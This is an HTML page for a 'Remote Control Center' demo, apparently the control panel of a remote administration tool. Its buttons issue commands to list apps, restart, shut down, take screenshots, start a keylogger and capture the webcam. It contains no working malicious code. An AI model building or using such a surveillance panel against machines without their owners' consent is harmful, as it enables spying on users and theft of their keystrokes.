<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Remote Control Demo</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/microsoft-signalr/7.0.5/signalr.min.js"></script>
    <link rel="stylesheet" href="style.css">
</head>

<body class="background">
    <h1>Remote Control Center</h1>

    <div class="parent">
        <div class="div1">
            <button class="comic-button" data-command="GET_APPS">
                <span>List Apps</span>
            </button>
        </div>

        <div class="div2">
            <button class="comic-button" data-command="RESTART">
                <span>Restart</span>
            </button>
        </div>

        <div class="div3">
            <button class="comic-button" data-command="CAPTURE_SCREEN">
                <span>Screenshot</span>
            </button>
        </div>

        <div class="div4">
            <button class="comic-button" data-command="START_KEYLOG">
                <span>Start KeyLog</span>
            </button>
        </div>

        <div class="div5">
            <button class="comic-button" data-command="SHUTDOWN">
                <span>Shutdown</span>
            </button>
        </div>

        <div class="div6">
            <button class="comic-button" data-command="START_WEBCAM" data-payload="5">
                <span>Cam (5s)</span>
            </button>
        </div>

        <div class="div7" style="overflow-y: auto;">
            <h3>Result Monitor</h3>
            <img id="screenImg" style="max-width: 100%; border: 1px solid #ccc; display: none;" />

            <ul id="logList" style="list-style-type: none; padding: 0;"></ul>
        </div>
    </div>

    <script src="ui.js"></script>
</body>
</html>